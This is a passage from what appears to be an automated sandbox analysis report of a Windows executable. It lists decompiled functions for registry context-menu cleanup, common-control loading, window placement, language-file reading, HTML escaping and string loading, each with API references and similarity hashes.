				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                    0x004045c2
                                                                                                                    0x004045d1
                                                                                                                    0x004045da
                                                                                                                    0x004045ef
                                                                                                                    0x004045f6
                                                                                                                    0x00404604
                                                                                                                    0x0040460b
                                                                                                                    0x00404610
                                                                                                                    0x00404616
                                                                                                                    0x00404617
                                                                                                                    0x00404618
                                                                                                                    0x00404628
                                                                                                                    0x00404629
                                                                                                                    0x0040462a
                                                                                                                    0x0040462f
                                                                                                                    0x00404630
                                                                                                                    0x00404631
                                                                                                                    0x0040463c
                                                                                                                    0x0040463d
                                                                                                                    0x0040463e
                                                                                                                    0x00404656
                                                                                                                    0x00404662
                                                                                                                    0x0040466b
                                                                                                                    0x0040466d
                                                                                                                    0x0040466e
                                                                                                                    0x00404674
                                                                                                                    0x00404679

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Delete_snwprintfmemset$Close
                                                                                                                    • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                    • API String ID: 1018939227-3575174989
                                                                                                                    • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                    • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                    • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                    • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                    0x0040314a
                                                                                                                    0x00403151
                                                                                                                    0x00403158
                                                                                                                    0x0040315a
                                                                                                                    0x00403162
                                                                                                                    0x00403166
                                                                                                                    0x00403190
                                                                                                                    0x00403190
                                                                                                                    0x00403198
                                                                                                                    0x00403199
                                                                                                                    0x0040319e
                                                                                                                    0x004031bb
                                                                                                                    0x004031a0
                                                                                                                    0x004031ad
                                                                                                                    0x004031b6
                                                                                                                    0x004031b6
                                                                                                                    0x0040319e
                                                                                                                    0x0040316e
                                                                                                                    0x00403176
                                                                                                                    0x0040317c
                                                                                                                    0x0040317f
                                                                                                                    0x0040317f
                                                                                                                    0x00403182
                                                                                                                    0x0040318a
                                                                                                                    0x00000000
                                                                                                                    0x0040318c
                                                                                                                    0x0040318c
                                                                                                                    0x00000000
                                                                                                                    0x0040318c

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                    • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                    • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                    • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                    • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                    • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                    0x00404da9
                                                                                                                    0x00404dbc
                                                                                                                    0x00404dbf
                                                                                                                    0x00404dc6
                                                                                                                    0x00404dcc
                                                                                                                    0x00404dce
                                                                                                                    0x00404de1
                                                                                                                    0x00404deb
                                                                                                                    0x00404df2
                                                                                                                    0x00404df4
                                                                                                                    0x00404df4
                                                                                                                    0x00404e07
                                                                                                                    0x00404e0d
                                                                                                                    0x00404e18
                                                                                                                    0x00404e1c
                                                                                                                    0x00404e1e
                                                                                                                    0x00404e27
                                                                                                                    0x00404e28
                                                                                                                    0x00404e29
                                                                                                                    0x00404e2f
                                                                                                                    0x00404e31
                                                                                                                    0x00404e37
                                                                                                                    0x00404e41
                                                                                                                    0x00404e42
                                                                                                                    0x00404e43
                                                                                                                    0x00404e46
                                                                                                                    0x00404e46
                                                                                                                    0x00404e1c
                                                                                                                    0x00404e4d
                                                                                                                    0x00404e50
                                                                                                                    0x00404e5f
                                                                                                                    0x00404e66
                                                                                                                    0x00404e52
                                                                                                                    0x00404e52
                                                                                                                    0x00404e52
                                                                                                                    0x00404e6d
                                                                                                                    0x00404e70
                                                                                                                    0x00404e85
                                                                                                                    0x00404e85
                                                                                                                    0x00000000
                                                                                                                    0x00404e72
                                                                                                                    0x00404e7b
                                                                                                                    0x00404e80
                                                                                                                    0x00404e83
                                                                                                                    0x00404e87
                                                                                                                    0x00404e89
                                                                                                                    0x00404e8b
                                                                                                                    0x00404e8b
                                                                                                                    0x00404ea8
                                                                                                                    0x00404ea8
                                                                                                                    0x00000000
                                                                                                                    0x00404e83

                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                    • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                    • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                    • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                    • GetWindowRect.USER32 ref: 00404E07
                                                                                                                    • GetParent.USER32(?), ref: 00404E12
                                                                                                                    • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2163313125-0
                                                                                                                    • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                    • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                    • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                    • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                    0x0040639c
                                                                                                                    0x004063a4
                                                                                                                    0x004063b2
                                                                                                                    0x004063c2
                                                                                                                    0x004063d3
                                                                                                                    0x004063dc
                                                                                                                    0x004063eb
                                                                                                                    0x004063f0
                                                                                                                    0x00406401
                                                                                                                    0x00000000
                                                                                                                    0x0040641e
                                                                                                                    0x0040641f

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                    • wcscpy.MSVCRT ref: 004063B2
                                                                                                                    • wcscpy.MSVCRT ref: 004063C2
                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                      • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                    • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                    • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                    • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                    • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                    0x0040adf6
                                                                                                                    0x0040adf8
                                                                                                                    0x0040adfa
                                                                                                                    0x0040adfb
                                                                                                                    0x0040adfb
                                                                                                                    0x0040ae02
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040ae04
                                                                                                                    0x0040ae05
                                                                                                                    0x0040ae6d
                                                                                                                    0x0040ae6e
                                                                                                                    0x0040ae73
                                                                                                                    0x0040ae76
                                                                                                                    0x0040ae7f
                                                                                                                    0x0040ae83
                                                                                                                    0x0040ae86
                                                                                                                    0x00000000
                                                                                                                    0x0040ae86
                                                                                                                    0x0040ae8f
                                                                                                                    0x0040ae0c
                                                                                                                    0x0040ae10
                                                                                                                    0x0040ae1e
                                                                                                                    0x0040ae3b
                                                                                                                    0x0040ae4a
                                                                                                                    0x0040ae65
                                                                                                                    0x0040ae7a
                                                                                                                    0x0040ae7e
                                                                                                                    0x0040ae67
                                                                                                                    0x0040ae67
                                                                                                                    0x0040ae68
                                                                                                                    0x00000000
                                                                                                                    0x0040ae68
                                                                                                                    0x0040ae4c
                                                                                                                    0x0040ae4c
                                                                                                                    0x0040ae4e
                                                                                                                    0x00000000
                                                                                                                    0x0040ae4e
                                                                                                                    0x0040ae3d
                                                                                                                    0x0040ae3d
                                                                                                                    0x0040ae3f
                                                                                                                    0x0040ae53
                                                                                                                    0x0040ae54
                                                                                                                    0x0040ae59
                                                                                                                    0x0040ae5c
                                                                                                                    0x0040ae5c
                                                                                                                    0x0040ae20
                                                                                                                    0x0040ae28
                                                                                                                    0x0040ae2d
                                                                                                                    0x0040ae30
                                                                                                                    0x0040ae30
                                                                                                                    0x0040ae12
                                                                                                                    0x0040ae12
                                                                                                                    0x0040ae13
                                                                                                                    0x00000000
                                                                                                                    0x0040ae13
                                                                                                                    0x00000000
                                                                                                                    0x0040ae10

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy
                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                    • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                    • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                    • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                    • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                    0x004041f9
                                                                                                                    0x00404205
                                                                                                                    0x00404208
                                                                                                                    0x00404217
                                                                                                                    0x0040421e
                                                                                                                    0x00404236
                                                                                                                    0x0040423f
                                                                                                                    0x0040424a
                                                                                                                    0x0040425f
                                                                                                                    0x0040426b
                                                                                                                    0x0040426e
                                                                                                                    0x0040426e
                                                                                                                    0x00404275
                                                                                                                    0x004043be
                                                                                                                    0x004043ce
                                                                                                                    0x004043d0
                                                                                                                    0x004043d3
                                                                                                                    0x004043da
                                                                                                                    0x004043da
                                                                                                                    0x004043c0
                                                                                                                    0x004043c3
                                                                                                                    0x004043c3
                                                                                                                    0x0040427b
                                                                                                                    0x0040428c
                                                                                                                    0x0040428f
                                                                                                                    0x00404295
                                                                                                                    0x004042a5
                                                                                                                    0x004042b8
                                                                                                                    0x004042cb
                                                                                                                    0x004042de
                                                                                                                    0x004042f1
                                                                                                                    0x00404304
                                                                                                                    0x00404317
                                                                                                                    0x0040432a
                                                                                                                    0x0040433d
                                                                                                                    0x00404350
                                                                                                                    0x00404363
                                                                                                                    0x00404376
                                                                                                                    0x00404389
                                                                                                                    0x0040439c
                                                                                                                    0x004043a4
                                                                                                                    0x004043af
                                                                                                                    0x004043b5
                                                                                                                    0x004043b5
                                                                                                                    0x004043f5

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040421E
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                    • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                      • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                      • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 2142561256-3993045852
                                                                                                                    • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                    • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                    • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                    • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 55%
                                                                                                                    			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                    0x00405b81
                                                                                                                    0x00405b88
                                                                                                                    0x00405b8a
                                                                                                                    0x00405b8a
                                                                                                                    0x00405b8f
                                                                                                                    0x00405b96
                                                                                                                    0x00405b9b
                                                                                                                    0x00405bad
                                                                                                                    0x00405bad
                                                                                                                    0x00405b9d
                                                                                                                    0x00405b9d
                                                                                                                    0x00405ba8
                                                                                                                    0x00405bab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405bab
                                                                                                                    0x00405be9
                                                                                                                    0x00405be9
                                                                                                                    0x00405baf
                                                                                                                    0x00405bb1
                                                                                                                    0x00405ce2
                                                                                                                    0x00405ce2
                                                                                                                    0x00405bb7
                                                                                                                    0x00405bbd
                                                                                                                    0x00405bf6
